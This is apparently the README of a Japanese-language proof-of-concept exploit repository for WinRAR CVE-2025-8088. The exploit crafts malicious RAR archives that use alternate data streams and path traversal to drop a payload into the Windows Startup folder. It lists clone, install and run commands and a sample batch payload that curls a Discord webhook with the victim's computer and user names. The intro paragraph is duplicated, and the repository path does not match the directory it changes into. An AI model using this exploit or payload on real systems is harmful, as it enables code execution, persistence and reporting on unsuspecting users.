
WinRARの脆弱性(CVE-2025-8088)の概念実証エクスプロイトで、バージョン7.12以下に影響します。このツールは、ペイロードをパストラバーサルを伴う代替データストリーム(ADS)に埋め込む悪意のあるRARアーカイブを作成し、任意のコード実行につながる可能性があります。
WinRARの脆弱性(CVE-2025-8088)の概念実証エクスプロイトで、バージョン7.12以下に影響します。このツールは、悪意のあるRARアーカイブを作成し、ペイロードを代替データストリーム(ADS)にパストラバーサルを伴って埋め込み、任意のコード実行につながる可能性があります。
# リポジトリをクローン
git clone https://github.com/techcorp/CVE-2025-8088-Exploit.git
cd best-CVE-2025-8088
# 依存関係をインストール
pip install reportlab
# エクスプロイトを実行
python CVE-2025-8088.py
ペイロードを編集してDiscord Webhookを呼び出す:
# スクリプト内のPAYLOAD変数を置き換える:
PAYLOAD = """@echo off
curl -H "Content-Type: application/json" -X POST -d "{\"content\": \"Extracted on %COMPUTERNAME% by %USERNAME%\"}" YOUR_DISCORD_WEBHOOK_URL
pause
"""
YOUR_DISCORD_WEBHOOK_URLを実際のWebhook URLに置き換えてください。
AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\